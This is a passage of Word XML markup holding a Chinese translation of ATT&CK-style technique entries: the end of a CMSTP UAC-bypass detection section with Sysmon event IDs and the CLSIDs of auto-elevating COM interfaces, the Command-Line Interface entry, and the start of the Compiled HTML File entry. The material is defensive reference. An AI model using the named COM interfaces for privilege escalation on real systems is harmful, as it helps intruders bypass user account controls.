          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>/</w:t>
      </w:r>
      <w:r w:rsidRPr="00E65C70">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>或</w:t>
      </w:r>
      <w:r w:rsidRPr="00E65C70">
        <w:t>事件</w:t>
      </w:r>
      <w:r w:rsidRPr="00E65C70">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>12</w:t>
      </w:r>
      <w:r w:rsidRPr="00E65C70">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>或</w:t>
      </w:r>
      <w:r w:rsidRPr="00E65C70">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>13</w:t>
      </w:r>
      <w:r w:rsidRPr="00E65C70">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>（</w:t>
      </w:r>
      <w:r w:rsidRPr="00E65C70">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>R</w:t>
      </w:r>
      <w:r w:rsidRPr="00E65C70">
        <w:t>egistryEvent</w:t>
      </w:r>
      <w:r w:rsidRPr="00E65C70">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>）。事件</w:t>
      </w:r>
      <w:r w:rsidRPr="00E65C70">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>10</w:t>
      </w:r>
      <w:r w:rsidRPr="00E65C70">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>中</w:t>
      </w:r>
      <w:r w:rsidRPr="00E65C70">
        <w:t>，</w:t>
      </w:r>
      <w:r w:rsidRPr="00E65C70">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>CallTrace</w:t>
      </w:r>
      <w:r w:rsidRPr="00E65C70">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>包含</w:t>
      </w:r>
      <w:r w:rsidRPr="00E65C70">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>CMLUA.dll</w:t>
      </w:r>
      <w:r w:rsidRPr="00E65C70">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>。事件</w:t>
      </w:r>
      <w:r w:rsidRPr="00E65C70">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>12</w:t>
      </w:r>
      <w:r w:rsidRPr="00E65C70">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>或</w:t>
      </w:r>
      <w:r w:rsidRPr="00E65C70">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>13</w:t>
      </w:r>
      <w:r w:rsidRPr="00E65C70">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>中，</w:t>
      </w:r>
      <w:r w:rsidRPr="00E65C70">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>TargetObject</w:t>
      </w:r>
      <w:r w:rsidRPr="00E65C70">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>包含</w:t>
      </w:r>
      <w:r w:rsidRPr="00E65C70">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>CMMGR32.exe</w:t>
      </w:r>
      <w:r w:rsidRPr="00E65C70">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>。另外还监控事件，例如进程创建事件（</w:t>
      </w:r>
      <w:r w:rsidRPr="00E65C70">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Sysmon</w:t>
      </w:r>
      <w:r w:rsidRPr="00E65C70">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>事件</w:t>
      </w:r>
      <w:r w:rsidRPr="00E65C70">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>1</w:t>
      </w:r>
      <w:r w:rsidRPr="00E65C70">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>），此</w:t>
      </w:r>
      <w:r w:rsidRPr="00E65C70">
        <w:t>事件</w:t>
      </w:r>
      <w:r w:rsidRPr="00E65C70">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>涉及自动升级的</w:t>
      </w:r>
      <w:r w:rsidRPr="00E65C70">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>CMSTP COM</w:t>
      </w:r>
      <w:r w:rsidRPr="00E65C70">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>接口，如</w:t>
      </w:r>
      <w:r w:rsidRPr="00E65C70">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>CMSTPLUA</w:t>
      </w:r>
      <w:r w:rsidRPr="00E65C70">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>（</w:t>
      </w:r>
      <w:r w:rsidRPr="00E65C70">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>3E5FC7F9-9A51-4367-9063-A120244FBEC7</w:t>
      </w:r>
      <w:r w:rsidRPr="00E65C70">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>）和</w:t>
      </w:r>
      <w:r w:rsidRPr="00E65C70">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>CMLUAUTIL</w:t>
      </w:r>
      <w:r w:rsidRPr="00E65C70">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>（</w:t>
      </w:r>
      <w:r w:rsidRPr="00E65C70">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>3E000D72-A845-4CD9-BD83-80C07C3B881F</w:t>
      </w:r>
      <w:r w:rsidRPr="00E65C70">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>）。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D9D844B" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>命令行</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>界面</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="af3"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblInd w:w="1560" w:type="dxa"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="8176"/>
      </w:tblGrid>
      <w:tr w:rsidR="000F2665" w:rsidRPr="00671A0D" w14:paraId="2F2B1AAB" w14:textId="77777777" w:rsidTr="00F815A5">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8176" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="5EE8FC06" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="00671A0D">
              <w:t>编号：</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:t>T1059</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2B1956A9" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r>
              <w:t>技术：</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>执行</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="061E5B21" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="00671A0D">
              <w:t>平台：</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:t>Linux</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>，</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:t>macOS</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>，</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:t>Windows</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="559AAA46" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="00671A0D">
              <w:t>所需权限：</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>用户</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:t>，管理员，系统</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="29831C7E" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="00671A0D">
              <w:t>数据源：</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>进程</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:t>监控，进程命令行参数</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="25E8D82E" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="00671A0D">
              <w:t>是否支持远程：</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>否</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="70BA1E58" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="00671A0D">
              <w:t>版本：</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:t>1.0</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="23AADFF9" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:pPr>
        <w:pStyle w:val="11"/>
        <w:ind w:left="1560"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6D5F22BB" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>命令行界面是与计算机系统交互的一种方式，并且是很多操作系统平台的常见特性。例如</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:t>，</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Windows</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>系统上的命令行界面</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>cmd</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>可用于执行许多任务，包括执行其他软件。命令行界面可在本地交互</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:t>或者</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>通过</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:t>远程桌面应用</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>、反向</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>shell</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>会话等</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:t>远程</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>交互。执行的命令以命令行界面进程的当前权限级别运行，除非该命令需要调用</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:t>进程来</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>更改权限上下文（例如，定时任务）。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75C44083" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>攻击者可能</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:t>会</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>使用命令行界面与系统交互并在操作过程中执行其他软件。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04EBE70B" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:pPr>
        <w:pStyle w:val="BlockLabel"/>
      </w:pPr>
      <w:r w:rsidRPr="00671A0D">
        <w:t>缓解</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="af3"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="2405"/>
        <w:gridCol w:w="7331"/>
      </w:tblGrid>
      <w:tr w:rsidR="000F2665" w:rsidRPr="00A21B67" w14:paraId="2AA494A7" w14:textId="77777777" w:rsidTr="00F815A5">
        <w:trPr>
          <w:trHeight w:val="353"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2405" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="E7E6E6" w:themeFill="background2"/>
          </w:tcPr>
          <w:p w14:paraId="690B3170" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00A21B67" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableHeading"/>
              <w:rPr>
                <w:b/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00A21B67">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:b/>
              </w:rPr>
              <w:t>缓解措施</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7331" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="E7E6E6" w:themeFill="background2"/>
          </w:tcPr>
          <w:p w14:paraId="6D74887A" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00A21B67" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableHeading"/>
              <w:rPr>
                <w:b/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00A21B67">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:b/>
              </w:rPr>
              <w:t>说明</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="000F2665" w:rsidRPr="00671A0D" w14:paraId="3F213CAE" w14:textId="77777777" w:rsidTr="00F815A5">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2405" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="06E7868A" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="00671A0D">
              <w:rPr>
                <w:rStyle w:val="af4"/>
                <w:rFonts w:hint="eastAsia"/>
                <w:color w:val="auto"/>
              </w:rPr>
              <w:t>执行预防</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7331" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="7B2114A0" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="00671A0D">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>在适当的情况下，使用应用白名单工具（如</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:t>Windows Defender Application Control</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>，</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>AppLocker</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>或软件限制策略）来审核和</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>/</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>或阻止不必要的命令行解释程序。</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="7921B11B" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:pPr>
        <w:pStyle w:val="11"/>
        <w:ind w:left="1560"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1C94471B" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:pPr>
        <w:pStyle w:val="BlockLabel"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00671A0D">
        <w:t>检测</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F7898AB" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>可以适当记录进程执行日志信息（包括</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:t>命令行参数信息</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>）来捕获命令行界面活动。这些</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:t>信息可能有助于获取攻击者活动相关的其它信息，</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>了解攻击者</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:t>如何使用进程或自定义工具。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5085CB5C" w14:textId="77777777" w:rsidR="000F2665" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008D796D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>HTML</w:t>
      </w:r>
      <w:r w:rsidRPr="008D796D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>编译文件</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="af3"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblInd w:w="1560" w:type="dxa"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="8176"/>
      </w:tblGrid>
      <w:tr w:rsidR="000F2665" w14:paraId="06CAA0EB" w14:textId="77777777" w:rsidTr="00F815A5">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8176" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="37D77059" w14:textId="77777777" w:rsidR="000F2665" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r>
              <w:t>编号</w:t>
            </w:r>
            <w:r>
              <w:t>: T1223</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5EFDDDB2" w14:textId="78215B34" w:rsidR="000F2665" w:rsidRDefault="00EB54DA" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r>
              <w:lastRenderedPageBreak/>
              <w:t>技术：</w:t>
            </w:r>
            <w:r w:rsidR="000F2665">
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidR="000F2665">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:hint="eastAsia"/>
              </w:rPr>
              <w:t>防御逃逸，执行</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4C2EEDEC" w14:textId="77777777" w:rsidR="000F2665" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r>
              <w:t>平台：</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> Windows</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3F6A6507" w14:textId="77777777" w:rsidR="000F2665" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r>
              <w:t>所需权限：</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:hint="eastAsia"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:hint="eastAsia"/>
              </w:rPr>
              <w:t>用户</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6FB2A5C4" w14:textId="77777777" w:rsidR="000F2665" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r>
              <w:t>数据源：</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:hint="eastAsia"/>
              </w:rPr>
              <w:t>文件监控</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">, </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:hint="eastAsia"/>
              </w:rPr>
              <w:t>进程监控</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">, </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:hint="eastAsia"/>
              </w:rPr>
              <w:t>进程命令行参数</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="338E4372" w14:textId="77777777" w:rsidR="000F2665" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>支持远程：</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:hint="eastAsia"/>
              </w:rPr>
              <w:t>否</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="73BE2DF9" w14:textId="77777777" w:rsidR="000F2665" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>绕过的防护：</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:hint="eastAsia"/>
              </w:rPr>
              <w:t>应用白名单</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">, </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:hint="eastAsia"/>
              </w:rPr>
              <w:t>数字证书验证</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="61F6A72F" w14:textId="77777777" w:rsidR="000F2665" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>贡献者：</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> Rahmat Nurfauzi, @infosecn1nja, PT Xynexis International</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4E78AE7C" w14:textId="77777777" w:rsidR="000F2665" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r>
              <w:t>版本：</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> 1.1</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="268C10FE" w14:textId="77777777" w:rsidR="000F2665" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:pPr>
        <w:pStyle w:val="afd"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="39434C"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6674ADE6" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00333366" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:r w:rsidRPr="00333366">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>编译过的</w:t>
      </w:r>
      <w:r w:rsidRPr="00333366">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>HTML</w:t>
      </w:r>
